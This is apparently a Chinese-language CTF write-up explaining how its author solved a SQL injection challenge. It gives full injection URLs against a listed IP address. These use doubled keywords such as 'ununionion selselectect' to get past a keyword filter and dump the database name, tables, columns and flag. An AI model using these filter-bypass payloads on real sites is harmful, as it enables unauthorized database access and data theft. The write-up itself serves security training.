OnionT@KillBoy
评论8,795字数 194阅读0分38秒阅读模式
根据题目提示,这道题是个SQL注入题,于是我们直接试探SQL注入,看到页面有个list点开看看
看着链接的样子就是有SQL注入的样子,哈哈哈,接下来让试试它过滤了啥,怎么闭合吧。通过测试发现,过滤了and 、or、select、union,最后试出来列数量是3,如下图:
接下来,爆数据库
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,database(),3--+
数据库名为web18
继续,爆表名
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+
爆字段名:
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='web18'--+
爆字段:
http://123.206.31.85:10018/list.php?id=-1' anandd 1=1 uniunionon seleselectct 1,flag,3 from flag--+
